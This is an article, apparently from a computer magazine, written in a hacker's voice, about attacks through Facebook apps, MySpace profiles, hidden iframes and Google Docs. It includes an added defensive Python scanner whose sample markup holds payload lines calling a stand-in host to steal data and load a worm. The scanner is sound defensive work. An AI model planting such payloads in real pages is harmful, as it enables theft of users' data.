Mind of a Web 2.0 Hacker

They harvest your data directly from the Web apps you use and the sites you visit. Here's how.

It's all become so easy. I used to write viruses and attack networks to show off how smart I am, but these days it isn't even a challenge: millions of you don't run any security at all at home. The hard part was finding you. Now, with this latest push toward cloud computing, especially social networking, SaaS (software as a service, all those neat Web 2.0 apps) and online storage, it's easier for me to find you and harvest your data. Let me tell you how I do it.

10 A.M. It's time to unleash my new Facebook app, a cute game about putting kittens in the microwave. By running my app you agree to share your entire profile with me, and if you've posted anything even remotely useful to me (like a credit card number), then I figure you deserve to have me steal it. Here's a similar bit of trickery I wish I'd thought of: in March 2008, a buffer overflow in the Aurigma ActiveX image uploader was exploited to plant malware on users' PCs.

11 A.M. My newest fake profile on MySpace is just about ready. Web 2.0 is all about sharing user-generated content; yeah, that content is my malware, and the best part is that you'll come and get it. Most people don't realize how easy MySpace makes it to customize profiles: I can upload simple code that your browser will run when you visit my page. I use that code to crash your PC while behind the scenes you download malware from another Web server I've compromised. This has already happened so many times that I call the tactic Old Faithful. The first one I ever heard about was the JavaScript worm Samy, which hit MySpace in 2005.

2 P.M. After a hearty lunch and a lovely nap, I get back to my latest attack: planting malicious iframes on sites that you already trust. An iframe is an inline frame, an HTML element that makes it possible to embed one Web page inside another. I host my attacks on a server in Ukraine, break into sites you trust, like CNN or PlayStation.com, and insert an iframe (usually sized to a single pixel or hidden with CSS, so you never see it) that sends you to my attack server while you still think you're on CNN.com.
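The 11 A.M. and 2 P.M. tricks above (and the spreadsheet iframe later in the day) come down to the same thing: a page you trust carries markup you did not put there. The Python scanner below is an added example, not code from the article or from any of the sites it names. It walks an HTML document with the standard library's html.parser and flags the payload shapes the article describes: script tags, inline event handlers, javascript: URLs (including Samy-style ones split across a newline inside a style attribute), and iframes that are hidden or point at a host other than the site being scanned. The hostnames (cnn.example, attack.example, myspace.example) and both sample pages are constructed for this example.

```python
"""Flag injected script/iframe payloads in HTML that a trusted site serves
or that a user uploaded as profile content. Added example; sample markup and
hostnames are constructed, not taken from any real site."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _px(value):
    """Parse a width/height attribute such as '1', '0px' or '100%'; None if absent."""
    if value is None:
        return None
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while the parser walks the document."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()   # host the page is expected to belong to
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}   # parser lowercases names
        if tag == "script":
            self.findings.append(("script", a.get("src") or "inline"))
            return
        for name, value in a.items():
            if name.startswith("on"):                         # onload, onerror, ...
                self.findings.append(("event-handler", f"<{tag} {name}>"))
            # Samy hid 'javascript:' by splitting it with a newline inside a style
            # attribute, so strip all whitespace before looking for the scheme.
            if "javascript:" in "".join(value.split()).lower():
                self.findings.append(("javascript-url", f"<{tag} {name}>"))
        if tag == "iframe":
            self._check_iframe(a)

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        # Off-origin: frame source is neither the site nor one of its subdomains.
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-origin")
        # Hidden: one-pixel (or smaller) box, or CSS that makes it invisible.
        style = "".join(a.get("style", "").split()).lower()
        width, height = _px(a.get("width")), _px(a.get("height"))
        tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
        if tiny or "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden")
        if reasons:
            self.findings.append(("iframe", f"{src} [{', '.join(reasons)}]"))


def scan(html, site_host):
    """Return the list of findings for one HTML document."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a news page with one legitimate video frame and one
# injected, invisible loader frame pointing at the attacker's server.
TRUSTED_PAGE = """<html><body>
<h1>Top stories</h1>
<iframe src="https://video.cnn.example/player" width="640" height="360"></iframe>
<iframe src="http://attack.example/loader.php" width="0" height="0" style="display: none"></iframe>
</body></html>"""

# Constructed sample: user-supplied profile markup carrying three payload shapes.
PROFILE_HTML = """<div id="about">
<p>Hi! I like kittens.</p>
<div style="background:url('java\nscript:alert(1)')">x</div>
<img src="x" onerror="fetch('http://attack.example/steal')">
<script src="http://attack.example/worm.js"></script>
</div>"""

if __name__ == "__main__":
    for label, html, host in (("news page", TRUSTED_PAGE, "cnn.example"),
                              ("profile", PROFILE_HTML, "myspace.example")):
        print(label)
        for kind, detail in scan(html, host):
            print(f"  {kind:15} {detail}")
```

A site operator would run this over pages fetched from its own servers (the 2 P.M. case) with the site's own hostname, and over profile or document content at upload time (the 11 A.M. and 6 P.M. cases). Scanning is a check, not a fix: user-generated content should still be escaped or passed through an allow-list sanitizer before it is served.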

4 P.M. Social networking works for hackers, too. Now I'm headed online to sell the credit card and bank info I've stolen. There are thousands of servers hosted outside the U.S. with message boards where anyone can buy or sell your identity. It's gotten so easy that prices have come down. I get just $3 for your Visa info, but that's okay because I've harvested thousands of credit card numbers today.

6 P.M. It's time to turn my attention to online apps. Do you use Google Docs? Google is so great. It even goes so far as to let me plant a malicious iframe in a spreadsheet. I can trick you into opening my spreadsheet, or simply break into your account and put an iframe in your own spreadsheet. Open up the doc and infect yourself with my bot, which quietly captures personal info like your username and password when you log in to banking sites.

Don't hate me, friend. After all, you're the one who made it so easy for me.

See you online,
